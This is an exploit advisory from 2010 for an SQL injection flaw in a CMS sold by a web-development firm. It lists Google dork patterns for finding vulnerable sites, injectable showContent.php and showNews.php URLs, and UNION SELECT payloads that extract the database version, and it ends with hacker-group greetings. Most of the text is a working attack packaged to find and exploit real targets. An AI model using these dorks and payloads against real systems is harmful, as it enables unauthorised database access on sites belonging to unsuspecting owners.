# Exploit Title: Worldviewer.com CMS SQL Injection Vulnerability# Date: 12-4-2010# Author: 41.w4r10r aka AN1L# Software Link :# Version: Web Application# Tested on: Apcahe/Unix# CVE : [if exists]# Dork :inurl:"php/showContent.php?linkid=" Or inurl:"/php/showNews.php?newsid="# Code :
This Is The CMS Created by The Leading WebDevelopment Company Worldviewer.com For There Clients andall have same
vulnerability.....
Exploited Link :1) http://example.com/php/showContent.php?linkid=5'
2) http://example.com/php/showNews.php?newsid=39'
Live Demo :1) http://example.com/php/showNews.php?newsid=-5+union+select+all+1,version()--2) http://example.com/php/showContent.php?linkid=-5+union+select+all+version()--#41.w4r10r (41.w4r10r@andhrahackers.com<mailto:41.w4r10r@andhrahackers.com><mailto:41.w4r10r@andhrahackers.com<mailto:41.w4r10r@andhrahackers.com>>)##################################################################################################Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]#Thanks: SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,DJ Hoodlum Don,Akee#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d#Catch us at www.andhrahackers.com<http://www.andhrahackers.com><http://www.andhrahackers.com> or www.teamicw.in<http://www.teamicw.in><http://www.teamicw.in>
